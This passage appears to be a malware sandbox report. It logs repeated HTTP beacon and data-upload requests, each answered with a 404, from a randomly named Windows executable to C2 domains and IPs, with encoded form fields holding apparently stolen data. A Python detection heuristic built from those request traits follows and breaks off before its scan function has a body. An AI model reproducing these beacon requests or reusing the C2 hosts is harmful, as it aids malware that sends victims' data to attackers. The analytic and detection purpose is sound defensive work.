                                                                                                              Jan 11, 2025 03:26:08.530402899 CET  485                OUT        GET /hkgx/?6n=wgVoJ8uM9T0/Zez2re1RszMbFHmAlDimGOKD8PxxFFLfP5o8U05sZY6pknTlSn+/tcq1eo8k+yVAgRwnrxxUvSVPlvrZOPxTHwBspwPrhhwxEcqkEw==&P8dT=Gvw8Prk0H4 HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-US
                                                                                                              Connection: close
                                                                                                              Host: www.xcvbj.asia
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36


                                                                                                              Session ID  Source IP     Source Port  Destination IP   Destination Port  PID   Process
                                                                                                              25          192.168.2.10  51552        101.35.209.183   80                6148  C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
                                                                                                              Timestamp                            Bytes transferred  Direction  Data
                                                                                                              Jan 11, 2025 03:26:35.466550112 CET  750                OUT        POST /31pt/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Cache-Control: no-cache
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Content-Length: 191
                                                                                                              Connection: close
                                                                                                              Host: www.yc791022.asia
                                                                                                              Origin: http://www.yc791022.asia
                                                                                                              Referer: http://www.yc791022.asia/31pt/
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                              Data Raw: 36 6e 3d 65 4f 72 4a 43 76 6d 61 42 4f 36 47 32 43 35 5a 6e 4f 54 59 6b 2b 39 77 64 42 59 48 57 50 6c 51 6d 4c 37 38 37 4e 55 30 61 74 6f 31 37 62 63 38 79 50 4e 43 74 65 54 70 4c 7a 52 49 42 56 36 41 37 72 76 78 41 51 59 37 72 58 61 55 47 4d 79 53 55 39 36 39 55 6b 38 36 6b 68 59 78 55 76 63 63 6c 64 36 73 44 45 4c 4e 37 31 69 50 64 36 76 49 39 48 6f 2b 75 6e 4c 77 58 74 66 4f 4a 36 33 4e 67 58 36 34 66 47 42 75 58 6e 6a 54 75 6e 38 50 72 66 66 35 37 33 78 5a 48 42 59 53 48 73 65 66 72 49 36 32 49 67 58 4b 4b 54 53 50 68 7a 4a 73 31 55 68 56 4d 59 6a 52 75 55 7a 57
                                                                                                              Data Ascii: 6n=eOrJCvmaBO6G2C5ZnOTYk+9wdBYHWPlQmL787NU0ato17bc8yPNCteTpLzRIBV6A7rvxAQY7rXaUGMySU969Uk86khYxUvccld6sDELN71iPd6vI9Ho+unLwXtfOJ63NgX64fGBuXnjTun8Prff573xZHBYSHsefrI62IgXKKTSPhzJs1UhVMYjRuUzW
Jan 11, 2025 03:26:36.338150978 CET | 427 | IN | HTTP/1.1 404 Not Found
Date: Sat, 11 Jan 2025 02:26:36 GMT
Server: Apache
Content-Length: 263
Connection: close
Content-Type: text/html; charset=iso-8859-1
                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.10 | 51553 | 101.35.209.183 | 80 | 6148 | C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:26:38.026559114 CET | 774 | OUT | POST /31pt/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 215
Connection: close
Host: www.yc791022.asia
Origin: http://www.yc791022.asia
Referer: http://www.yc791022.asia/31pt/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                              Data Raw: 36 6e 3d 65 4f 72 4a 43 76 6d 61 42 4f 36 47 73 67 74 5a 6c 76 54 59 77 75 39 2f 44 52 59 48 66 76 6c 63 6d 4c 33 38 37 4d 41 6b 61 66 63 31 2b 4f 67 38 7a 4e 6c 43 67 2b 54 70 54 44 52 4e 4d 31 36 39 37 72 7a 44 41 55 59 37 72 58 4f 55 47 4a 65 53 55 4b 75 36 55 30 38 30 72 42 59 6b 51 76 63 63 6c 64 36 73 44 46 76 6e 37 30 4b 50 64 49 37 49 38 6a 38 39 31 48 4c 78 55 74 66 4f 4e 36 33 4a 67 58 36 61 66 44 5a 49 58 69 76 54 75 6a 73 50 72 75 66 2b 78 33 78 66 59 52 5a 4e 41 4a 48 4a 6b 64 4f 47 4e 68 32 48 56 78 57 34 69 53 30 72 6b 46 41 43 66 76 2f 66 67 53 47 38 69 35 44 7a 42 37 76 53 44 34 67 33 75 4c 77 34 39 75 79 75 64 77 3d 3d
                                                                                                              Data Ascii: 6n=eOrJCvmaBO6GsgtZlvTYwu9/DRYHfvlcmL387MAkafc1+Og8zNlCg+TpTDRNM1697rzDAUY7rXOUGJeSUKu6U080rBYkQvccld6sDFvn70KPdI7I8j891HLxUtfON63JgX6afDZIXivTujsPruf+x3xfYRZNAJHJkdOGNh2HVxW4iS0rkFACfv/fgSG8i5DzB7vSD4g3uLw49uyudw==
Jan 11, 2025 03:26:38.905124903 CET | 427 | IN | HTTP/1.1 404 Not Found
Date: Sat, 11 Jan 2025 02:26:38 GMT
Server: Apache
Content-Length: 263
Connection: close
Content-Type: text/html; charset=iso-8859-1
                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.10 | 51554 | 101.35.209.183 | 80 | 6148 | C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:26:40.669325113 CET | 1787 | OUT | POST /31pt/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 1227
Connection: close
Host: www.yc791022.asia
Origin: http://www.yc791022.asia
Referer: http://www.yc791022.asia/31pt/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                              Data Raw: 36 6e 3d 65 4f 72 4a 43 76 6d 61 42 4f 36 47 73 67 74 5a 6c 76 54 59 77 75 39 2f 44 52 59 48 66 76 6c 63 6d 4c 33 38 37 4d 41 6b 61 66 6b 31 2b 59 55 38 79 71 35 43 68 2b 54 70 4e 7a 52 4d 4d 31 36 73 37 72 36 4b 41 55 56 45 72 56 32 55 48 72 57 53 63 66 43 36 66 30 38 30 7a 78 59 77 55 76 63 7a 6c 64 71 77 44 46 2f 6e 37 30 4b 50 64 4a 4c 49 38 33 6f 39 33 48 4c 77 58 74 66 53 4a 36 33 78 67 58 79 77 66 44 56 2b 58 52 6e 54 75 44 38 50 34 73 33 2b 73 6e 78 64 62 52 5a 46 41 4a 43 58 6b 5a 57 73 4e 68 44 71 56 7a 32 34 30 7a 55 39 6d 30 38 6f 63 65 58 4a 67 68 2b 74 77 70 65 54 50 2f 43 71 53 34 51 57 31 6f 78 32 78 71 62 6c 43 77 79 77 4d 2f 38 65 57 6c 79 74 49 75 46 76 69 74 4b 4b 44 35 50 4f 2f 7a 7a 6c 62 57 74 62 64 49 76 74 62 59 75 43 4e 57 38 75 54 59 32 63 54 62 6f 57 6f 6c 73 73 71 79 76 36 42 58 39 6a 55 75 68 6b 4d 75 62 74 68 6f 37 4e 66 75 74 74 65 38 56 6a 77 4b 42 6b 76 6c 6f 6e 6e 77 65 2b 76 75 4c 51 34 69 42 30 65 37 4f 70 6c 33 4b 51 39 6b 37 51 33 61 69 76 63 49 55 53 54 35 50 [TRUNCATED]
                                                                                                              Data Ascii: 6n=eOrJCvmaBO6GsgtZlvTYwu9/DRYHfvlcmL387MAkafk1+YU8yq5Ch+TpNzRMM16s7r6KAUVErV2UHrWScfC6f080zxYwUvczldqwDF/n70KPdJLI83o93HLwXtfSJ63xgXywfDV+XRnTuD8P4s3+snxdbRZFAJCXkZWsNhDqVz240zU9m08oceXJgh+twpeTP/CqS4QW1ox2xqblCwywM/8eWlytIuFvitKKD5PO/zzlbWtbdIvtbYuCNW8uTY2cTboWolssqyv6BX9jUuhkMubtho7Nfutte8VjwKBkvlonnwe+vuLQ4iB0e7Opl3KQ9k7Q3aivcIUST5P8AlNAKD9QgVARGyuHvKKrIgQ6vLbONSGj6rHynUJcOCtGUhD7U+FO/lyd+kMiPeCJ8WdbBHBN/nh2vEupBXiuk4bDlFQkZzUyQexBrjBkgmWSuY74T9nsDsPkbZhjkQISRSgxqfa0RcOIgG0RGoKopeIDAtycwOYM7vOVhe6ukYYa5gyC9xP7/FHXNKVyD56gVyOZXQzmQmydADNC/5dtA4ypxajqCoz/ErowcoECT4oFAllt0PZ4R29AIE4fg0qqYs0aTF6nE3y/2hjeaYKaQaG+FRplyptf0G48thCjxdula15LVfkLhJkwmCVnFc5xKlMUSWJbv3/cPgC8tiVKbS0uhw0q3vVB6hoCvfJCqcoUUz79XWl1T+1WIQkKut3Mizojhzs/QtpjF6GmYBM7qjwIuctqqFr4XG7SfbcN6sNifwCL1xdtVlEpJ5dOIKK68nNpB1MKzs/BEF3eOKk5psh5VicQ4SAD0nY/wp+8v26QNhIAESmJN8LmaOhvVbXq3ParcRE7++ICyANrJcXbVgcjDHJGr5gndEQuTpdUpfEISUh9QzSua4MzZDgKaPJuV7jfevaES39ENKHG2aBJqkFMHBqiy5OZT4IyoK4uIMrRk3Ja0UJYZMlCz8eRRgEunatnv2Hj0iffRe1Cd7p+lodueoN1+35yY [TRUNCATED]
Jan 11, 2025 03:26:41.515460968 CET | 427 | IN | HTTP/1.1 404 Not Found
Date: Sat, 11 Jan 2025 02:26:41 GMT
Server: Apache
Content-Length: 263
Connection: close
Content-Type: text/html; charset=iso-8859-1
                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.10 | 51555 | 101.35.209.183 | 80 | 6148 | C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:26:43.219949007 CET | 488 | OUT | GET /31pt/?6n=TMDpBYanOquY9Rx7lbKrlsthbxkcecghv73C9/MKdrwqjZcj4ORMyeLFBityLVio1oCUCVJYl2rwHayMePC/X0BgzzdODOQRhsaLMWye0XS2e8Pang==&P8dT=Gvw8Prk0H4 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Connection: close
Host: www.yc791022.asia
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Jan 11, 2025 03:26:44.089569092 CET | 427 | IN | HTTP/1.1 404 Not Found
Date: Sat, 11 Jan 2025 02:26:43 GMT
Server: Apache
Content-Length: 263
Connection: close
Content-Type: text/html; charset=iso-8859-1
                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.10 | 51556 | 154.23.178.231 | 80 | 6148 | C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:26:49.493855953 CET | 738 | OUT | POST /p3j6/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 191
Connection: close
Host: www.43kdd.top
Origin: http://www.43kdd.top
Referer: http://www.43kdd.top/p3j6/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                              Data Raw: 36 6e 3d 44 58 35 57 42 7a 37 50 69 38 6b 64 6a 32 32 64 54 45 62 59 49 73 5a 48 6e 75 79 6b 64 4b 72 34 55 6c 42 61 55 39 79 4c 68 54 6a 71 35 63 6f 7a 71 33 76 45 2f 32 56 4c 53 57 65 4f 33 4f 4e 37 62 36 7a 78 49 49 6e 75 58 78 66 41 36 65 41 58 2f 6d 48 49 41 57 7a 41 52 6a 4f 37 36 74 34 33 75 49 59 6e 43 4d 52 52 36 43 50 51 30 6b 6e 4a 72 49 47 4d 71 4b 61 6f 5a 53 63 39 62 79 52 57 65 71 49 71 2b 6a 76 57 78 4e 79 6b 67 67 51 6e 64 6d 78 57 38 32 44 49 53 4c 59 32 74 36 54 41 36 37 79 4d 4b 65 39 65 4f 48 67 64 37 30 74 68 48 74 4d 56 6b 41 63 5a 50 34 67 6b
                                                                                                              Data Ascii: 6n=DX5WBz7Pi8kdj22dTEbYIsZHnuykdKr4UlBaU9yLhTjq5cozq3vE/2VLSWeO3ON7b6zxIInuXxfA6eAX/mHIAWzARjO76t43uIYnCMRR6CPQ0knJrIGMqKaoZSc9byRWeqIq+jvWxNykggQndmxW82DISLY2t6TA67yMKe9eOHgd70thHtMVkAcZP4gk
Jan 11, 2025 03:26:50.383697987 CET | 312 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Sat, 11 Jan 2025 02:26:50 GMT
Content-Type: text/html
Content-Length: 148
Connection: close
ETag: "67811756-94"
                                                                                                              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.10 | 51557 | 154.23.178.231 | 80 | 6148 | C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:26:52.049612999 CET | 762 | OUT | POST /p3j6/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 215
Connection: close
Host: www.43kdd.top
Origin: http://www.43kdd.top
Referer: http://www.43kdd.top/p3j6/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                              Data Raw: 36 6e 3d 44 58 35 57 42 7a 37 50 69 38 6b 64 6a 56 75 64 52 6a 76 59 63 38 5a 45 69 75 79 6b 48 36 72 6b 55 6c 4e 61 55 34 4b 6c 68 68 33 71 35 38 59 7a 6c 57 76 45 36 32 56 4c 64 47 65 4c 36 75 4e 4b 62 36 75 4f 49 4c 2f 75 58 78 4c 41 36 66 77 58 38 56 76 4c 42 47 7a 65 61 44 4f 6c 6e 64 34 33 75 49 59 6e 43 4d 30 36 36 43 58 51 31 51 6a 4a 35 35 47 50 6e 71 61 72 51 79 63 39 4d 69 52 53 65 71 4a 4e 2b 69 79 65 78 4f 61 6b 67 69 49 6e 64 54 4e 56 7a 32 44 4b 57 4c 59 70 6a 34 57 7a 6a 2b 61 6f 56 50 39 77 59 58 34 4e 34 56 51 6d 57 38 74 43 33 33 41 58 42 2b 56 4f 4b 36 70 45 76 6d 50 6a 4b 70 48 51 79 43 62 43 43 71 74 71 42 67 3d 3d
                                                                                                              Data Ascii: 6n=DX5WBz7Pi8kdjVudRjvYc8ZEiuykH6rkUlNaU4Klhh3q58YzlWvE62VLdGeL6uNKb6uOIL/uXxLA6fwX8VvLBGzeaDOlnd43uIYnCM066CXQ1QjJ55GPnqarQyc9MiRSeqJN+iyexOakgiIndTNVz2DKWLYpj4Wzj+aoVP9wYX4N4VQmW8tC33AXB+VOK6pEvmPjKpHQyCbCCqtqBg==
Jan 11, 2025 03:26:52.949693918 CET | 312 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Sat, 11 Jan 2025 02:26:52 GMT
Content-Type: text/html
Content-Length: 148
Connection: close
ETag: "67811756-94"
                                                                                                              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

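The sessions above all share one request shape: a POST (or, in session 28, a GET) to a single short alphanumeric directory on the C2 host, a fixed Windows NT 6.1 / Chrome 35 User-Agent, Origin and Referer pointing back at the same host and path, Connection: close, and a body or query string made of short keys (6n, P8dT) carrying opaque base64-alphabet blobs, answered in every case by a 404. The following is an added example, not Joe Sandbox code and not a vendor signature: a small parser plus a heuristic scorer built only from those page-visible traits, run over the session 25 and session 28 requests copied from this report and a constructed benign control request. Treating this shape as a general FormBook signature, the indicator names, the 2-to-4 character key length and the three-indicator threshold are all assumptions to be tuned against your own captures.

```python
"""Heuristic detection for the C2 beacon shape captured in the sessions above.

Added example for this report, not Joe Sandbox code and not a vendor signature.
Every indicator below is lifted from the requests shown on this page: the fixed
Chrome/35 User-Agent, the short alphanumeric directory (/31pt/, /p3j6/), Origin
and Referer pointing back at the same host and path, and a body or query made of
short keys carrying opaque base64-alphabet blobs (6n=..., P8dT=...). Treating
that shape as a general FormBook signature is an assumption.
"""
import re
from urllib.parse import urlsplit

# Identical User-Agent on every captured request (Windows NT 6.1 / Chrome 35).
BEACON_UA = ("Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 "
             "(KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36")
# Captured C2 paths are a single 4-character alphanumeric directory.
SHORT_PATH = re.compile(r"^/[A-Za-z0-9]{4}/$")
# Field keys seen on the page: "6n" and "P8dT"; values use only the base64 alphabet.
FIELD_KEY = re.compile(r"^[A-Za-z0-9]{2,4}$")
B64_BLOB = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def parse_http_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into method, path, query, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    path, _, query = target.partition("?")
    return {"method": method, "path": path, "query": query,
            "version": version, "headers": headers, "body": body}


def split_fields(encoded: str) -> list:
    """Split k=v&k=v by hand: urllib's parse_qsl would turn the '+' inside a
    base64 blob into a space and break the alphabet check below."""
    fields = []
    for part in encoded.split("&"):
        if part:
            key, _, value = part.partition("=")
            fields.append((key, value))
    return fields


def beacon_indicators(req: dict) -> list:
    """Return the names of the page-derived indicators this request matches."""
    h = req["headers"]
    host = h.get("host", "")
    hits = []
    if SHORT_PATH.match(req["path"]):
        hits.append("short-random-path")
    if h.get("user-agent") == BEACON_UA:
        hits.append("fixed-chrome35-ua")
    if (req["method"] == "POST"
            and urlsplit(h.get("origin", "")).netloc == host
            and h.get("referer") == f"http://{host}{req['path']}"):
        hits.append("self-referential-origin-referer")
    fields = split_fields(req["body"] if req["method"] == "POST" else req["query"])
    if fields and all(FIELD_KEY.match(k) and B64_BLOB.match(v) for k, v in fields):
        hits.append("opaque-short-key-fields")
    if h.get("connection", "").lower() == "close":
        hits.append("connection-close")
    return hits


def is_beacon(req: dict) -> bool:
    """Flag when the opaque-field shape plus at least two more indicators match."""
    hits = beacon_indicators(req)
    return "opaque-short-key-fields" in hits and len(hits) >= 3


def _req(start_line: str, headers: list, body: str = "") -> str:
    return "\r\n".join([start_line, *headers, "", body])


_COMMON = ["Accept-Language: en-US", "Connection: close", f"User-Agent: {BEACON_UA}"]

# Session 25 above (POST; body copied verbatim from its Data Ascii row).
SAMPLE_POST = _req("POST /31pt/ HTTP/1.1", _COMMON + [
    "Content-Type: application/x-www-form-urlencoded", "Content-Length: 191",
    "Host: www.yc791022.asia", "Origin: http://www.yc791022.asia",
    "Referer: http://www.yc791022.asia/31pt/"],
    "6n=eOrJCvmaBO6G2C5ZnOTYk+9wdBYHWPlQmL787NU0ato17bc8yPNCteTpLzRIBV6A7rvxAQY7rXaUGMySU969Uk86khYxUvccld6sDELN71iPd6vI9Ho+unLwXtfOJ63NgX64fGBuXnjTun8Prff573xZHBYSHsefrI62IgXKKTSPhzJs1UhVMYjRuUzW")

# Session 28 above (GET; the blob moves into the query string, plus a second short key).
SAMPLE_GET = _req("GET /31pt/?6n=TMDpBYanOquY9Rx7lbKrlsthbxkcecghv73C9/MKdrwqjZcj4ORMyeLFBityLVio1oCUCVJYl2rwHayMePC/X0BgzzdODOQRhsaLMWye0XS2e8Pang==&P8dT=Gvw8Prk0H4 HTTP/1.1",
                  _COMMON + ["Host: www.yc791022.asia"])

# Constructed benign control request; not from the report.
BENIGN_GET = _req("GET /search?q=hello&lang=en HTTP/1.1", [
    "Host: www.example.com", "Connection: keep-alive",
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0.0.0 Safari/537.36"])


def scan(raw_requests: list) -> list:
    """Return (request line, matched indicators) for every flagged request."""
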